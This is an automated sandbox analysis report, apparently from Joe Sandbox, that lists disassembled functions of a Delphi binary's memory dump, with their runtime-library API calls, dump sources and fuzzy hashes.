                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104C2
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104DF
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(?,00000000,50010520,?,?,?,00000000,00000000), ref: 500104F5
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 50010500
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Unicode$Char$qqrr20FromStringb$Cat3$qqrr20Except$qqrvException@$bctr$qqrp20RaiseStringStringt2Stringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1860790855-0
                                                                                                  • Opcode ID: caeef3e0a6f3d13820a5c3a4a28f008e23b8d367d4d1577ca5722a4c6e0df794
                                                                                                  • Instruction ID: c00f10eb4ef58a00c0e347cc1ac883bdfb410f2ed051d6b945eaac8d7ac344f1
                                                                                                  • Opcode Fuzzy Hash: caeef3e0a6f3d13820a5c3a4a28f008e23b8d367d4d1577ca5722a4c6e0df794
                                                                                                  • Instruction Fuzzy Hash: EE1126716053C49BFB10DAA4ECD1BDFB39AEF48310F604277FA4083745D9B99E804691
                                                                                                  Function 5002B9E8 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5002B9FE
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002BA29
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002BA24
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002BA4C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002BA51
                                                                                                  • @Sysutils@TStringBuilder@set_Length$qqri.RTL120 ref: 5002BA5D
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5002BA77
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$String$Sysutils@$RaiseRecxiUnicode$Except$qqrvException@$bctr$qqrp20Recpx14$ArrayAsg$qqrr20Builder@set_ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20Length$qqriLength$qqrvList$qqrvLoadMetaMove$qqrpxvpviString$qqrp20Stringpx14Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2784925796-0
                                                                                                  • Opcode ID: 1667041f6e4c4e04a8d4a2e82b0d72eb47a86ad2971957d0b5d070b1c05cbe15
                                                                                                  • Instruction ID: cb949063882ccfe4f8492ee94f7a12960d0db32fb565db7cba8276b964dc1cb1
                                                                                                  • Opcode Fuzzy Hash: 1667041f6e4c4e04a8d4a2e82b0d72eb47a86ad2971957d0b5d070b1c05cbe15
                                                                                                  • Instruction Fuzzy Hash: 6C118630A025859BD710DFACFD81AADB7B9AF54318F5482AAE904DB352DA719D048BD0
                                                                                                  Function 5001A43C Relevance: 10.6, APIs: 7, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A474
                                                                                                  • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A480
                                                                                                  • CharUpperBuffW.USER32(?,?,00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A490
                                                                                                  • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A49C
                                                                                                  • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A4A7
                                                                                                  • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A4B2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@Wide$FromUnicode$CharUpper$AnsiBuffCase$qqrx20Char$qqrx17Len$qqrr17Str$qqrr17Str$qqrr20StringpbiStringx17Stringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 534983715-0
                                                                                                  • Opcode ID: 5d27df0171de173af17c0cc5cb6ee76833d8b56f58fc8406f40f8d3b55e42c42
                                                                                                  • Instruction ID: 33202aa56892b5c3d98ea78cec372edfaed5d9f2320c7c772028933169ede13c
                                                                                                  • Opcode Fuzzy Hash: 5d27df0171de173af17c0cc5cb6ee76833d8b56f58fc8406f40f8d3b55e42c42
                                                                                                  • Instruction Fuzzy Hash: D711A530B01794ABEB10CBE8DD51B9DB3E8DB9A200F908672F900E3741D774DE458794
                                                                                                  Function 5001A4E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A518
                                                                                                  • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A524
                                                                                                  • CharLowerBuffW.USER32(?,?,00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A534
                                                                                                  • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A540
                                                                                                  • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A54B
                                                                                                  • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A556
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@Wide$FromUnicode$CharLower$AnsiBuffCase$qqrx20Char$qqrx17Len$qqrr17Str$qqrr17Str$qqrr20StringpbiStringx17Stringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 176228272-0
                                                                                                  • Opcode ID: 644b9fb92c3d6ef07a5067c8370350d292bcda6fbce292a46e7a1feb9069b290
                                                                                                  • Instruction ID: d20671b8514017f2aeb96368901a0b64a7eab2f548f792ed05b88fe4d05113d0
                                                                                                  • Opcode Fuzzy Hash: 644b9fb92c3d6ef07a5067c8370350d292bcda6fbce292a46e7a1feb9069b290
                                                                                                  • Instruction Fuzzy Hash: D0115230B05694ABEB10CBA8DD51B9DB7E9EB4A600FD146B2F900E7341DA30DE458A94
                                                                                                  Function 5000A89C Relevance: 10.6, APIs: 7, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5000A8A6
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A8B2
                                                                                                    • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                    • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                    • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                  • @System@@UniqueStringU$qqrr20System@UnicodeString.RTL120 ref: 5000A8C9
                                                                                                  • @System@@UniqueStringU$qqrr20System@UnicodeString.RTL120 ref: 5000A8EC
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5000A91E
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A92C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$StringSystem@Unicode$ArrayLength$qqrr20Length$qqrvStringiU$qqrr20Unique$AnsiClr$qqrpvFromMem$qqrrpviReallocStr$qqrr20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 63268518-0
                                                                                                  • Opcode ID: d8794426dce69a8afdf5edacf3f7190b1c801e4214ab63c3ffaa2eb2339d506f
                                                                                                  • Instruction ID: 589278789b040e58112a918f3487c0d04965380cb2fd0c6ea7f3740b3ad11151
                                                                                                  • Opcode Fuzzy Hash: d8794426dce69a8afdf5edacf3f7190b1c801e4214ab63c3ffaa2eb2339d506f
                                                                                                  • Instruction Fuzzy Hash: 2001DD103125694EE3117FAE9851BBBB2D6DFF22117818336F145C763ADFA84946C2C0
                                                                                                  Function 5002A448 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 5002A3F8: @Sysutils@HashName$qqrpc.RTL120 ref: 5002A412
                                                                                                    • Part of subcall function 5000E884: GetProcAddress.KERNEL32(?,?), ref: 5000E8A8
                                                                                                    • Part of subcall function 5000E884: @System@@LStrClr$qqrpv.RTL120(5000E8EE,?,?,00000000), ref: 5000E8E1
                                                                                                  • @Sysutils@GetModuleName$qqrui.RTL120(?,Initialize,00000000,5002A4DD), ref: 5002A48C
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,?,Initialize,00000000,5002A4DD), ref: 5002A4A9
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,?,Initialize,00000000,5002A4DD), ref: 5002A4B8
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,Initialize,00000000,5002A4DD), ref: 5002A4BD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Sysutils@$System@@$AddressClr$qqrpvExcept$qqrvException@$bctr$qqrx20HashLoadModuleName$qqrpcName$qqruiProcRaiseRecxiStringString$qqrp20Stringpx14Unicode
                                                                                                  • String ID: Initialize
                                                                                                  • API String ID: 1682061199-2538663250
                                                                                                  • Opcode ID: ab808db70563f3f0fa6552d98e969f741daa7b01a3021ac412289ab684d2b595
                                                                                                  • Instruction ID: 46ff4c201679bb6a9b3a02cb542a9fa2f8a22491ac8c3f2d76804c6127a1f597
                                                                                                  • Opcode Fuzzy Hash: ab808db70563f3f0fa6552d98e969f741daa7b01a3021ac412289ab684d2b595
                                                                                                  • Instruction Fuzzy Hash: EC11C875A066995FD714EBE8FC5199EB7B8EF99300F80466AF814D3341DE74990086A0
                                                                                                  Function 50031010 Relevance: 10.6, APIs: 7, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VariantClear.OLEAUT32(?), ref: 5003101F
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(?,?,?,?,500310B6,50030FEB), ref: 50031024
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(?,?,?,500310B6,50030FEB), ref: 5003103A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Check$qqrlClearClr$qqrpvResultSystem@@VariantVariants@
                                                                                                  • String ID:
                                                                                                  • API String ID: 452420788-0
                                                                                                  • Opcode ID: eb70d2b8eab186a06ea140340b4e8703a8d7132057e564f3d20b5dcbcbd0fb7d
                                                                                                  • Instruction ID: 52db8ca31b00b2e44e7104484223e2f8e7d0f429c131b9206ee594ad239fc269
                                                                                                  • Opcode Fuzzy Hash: eb70d2b8eab186a06ea140340b4e8703a8d7132057e564f3d20b5dcbcbd0fb7d
                                                                                                  • Instruction Fuzzy Hash: 9D01D4117061D08E9B2EBB74E8955DE27DA9F5C200F685B73F004AB127CBF98CC583A2
                                                                                                  Function 5002C12C Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002C13F
                                                                                                  • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C165
                                                                                                  • @Strutils@MidStr$qqrx17System@WideStringxixi.RTL120(?,?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C174
                                                                                                  • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C17F
                                                                                                  • @Sysutils@TStringBuilder@$bctr$qqrx20System@UnicodeStringi.RTL120(?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C18B
                                                                                                  • @System@@WStrArrayClr$qqrpvi.RTL120(5002C1BA,?,?,?,00000000,00000000,00000000), ref: 5002C1A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicodeWide$From$ArrayBuilder@$bctr$qqrx20ClassClassoClr$qqrpviCreate$qqrp17MetaStr$qqrr17Str$qqrr20Str$qqrx17StringiStringx17Stringx20StringxixiStrutils@Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3564302108-0
                                                                                                  • Opcode ID: a080771f1c208bee87336802870a022ba774bc40fe05722359fd5bb0d4ea6352
                                                                                                  • Instruction ID: 58922c8f4528d5c8cfb5e260768a024238476e9fd86c34fd90099dd993f29032
                                                                                                  • Opcode Fuzzy Hash: a080771f1c208bee87336802870a022ba774bc40fe05722359fd5bb0d4ea6352
                                                                                                  • Instruction Fuzzy Hash: B1019231A01549ABDB15CB94EC92EDEB7B9DF89710FA08263F90497291DB30AE118690
                                                                                                  Function 50028934 Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@StrNew$qqrpxc.RTL120 ref: 50028947
                                                                                                  • @Sysutils@StrLower$qqrpc.RTL120 ref: 5002894C
                                                                                                  • @Sysutils@StrNew$qqrpxc.RTL120(00000000,500289AE), ref: 50028964
                                                                                                    • Part of subcall function 5001DFD8: @Sysutils@StrLen$qqrpxc.RTL120(?,?,5002894C), ref: 5001DFE7
                                                                                                    • Part of subcall function 5001DFD8: @Sysutils@AnsiStrAlloc$qqrui.RTL120(?,?,5002894C), ref: 5001DFF1
                                                                                                    • Part of subcall function 5001DFD8: @Sysutils@StrMove$qqrpcpxcui.RTL120(?,?,5002894C), ref: 5001DFFA
                                                                                                  • @Sysutils@StrLower$qqrpc.RTL120(00000000,500289AE), ref: 50028969
                                                                                                  • @Sysutils@StrPos$qqrpxct1.RTL120(00000000,500289AE), ref: 50028977
                                                                                                  • @Sysutils@StrDispose$qqrpc.RTL120(500289B5), ref: 500289A0
                                                                                                  • @Sysutils@StrDispose$qqrpc.RTL120(500289B5), ref: 500289A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sysutils@$Dispose$qqrpcLower$qqrpcNew$qqrpxc$Alloc$qqruiAnsiLen$qqrpxcMove$qqrpcpxcuiPos$qqrpxct1
                                                                                                  • String ID:
                                                                                                  • API String ID: 3159898584-0
                                                                                                  • Opcode ID: 65390a648ab706a9b4138e702ec1e558a2639dcf986a1068156ad4c86a6bf754
                                                                                                  • Instruction ID: 6b6a953f60cceed264f0bcce53d0f64a15a6626de01668e467ade48e568e826d
                                                                                                  • Opcode Fuzzy Hash: 65390a648ab706a9b4138e702ec1e558a2639dcf986a1068156ad4c86a6bf754
                                                                                                  • Instruction Fuzzy Hash: 58012C71A12A88AFCB01DFF8EC4159DBBF5EF49200F5186BAF414E3241D6345E82CB91
                                                                                                  Function 500289C0 Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@StrNew$qqrpxb.RTL120 ref: 500289D3
                                                                                                  • @Sysutils@StrLower$qqrpb.RTL120 ref: 500289D8
                                                                                                    • Part of subcall function 5001DF24: @Sysutils@StrLen$qqrpxb.RTL120(?,?,500289DD), ref: 5001DF2C
                                                                                                  • @Sysutils@StrNew$qqrpxb.RTL120(00000000,50028A3A), ref: 500289F0
                                                                                                    • Part of subcall function 5001E004: @Sysutils@StrLen$qqrpxb.RTL120(?,?,500289D8), ref: 5001E013
                                                                                                    • Part of subcall function 5001E004: @Sysutils@WideStrAlloc$qqrui.RTL120(?,?,500289D8), ref: 5001E01D
                                                                                                    • Part of subcall function 5001E004: @Sysutils@StrMove$qqrpbpxbui.RTL120(?,?,500289D8), ref: 5001E026
                                                                                                  • @Sysutils@StrLower$qqrpb.RTL120(00000000,50028A3A), ref: 500289F5
                                                                                                  • @Sysutils@StrPos$qqrpxbt1.RTL120(00000000,50028A3A), ref: 50028A03
                                                                                                  • @Sysutils@StrDispose$qqrpb.RTL120(50028A41), ref: 50028A2C
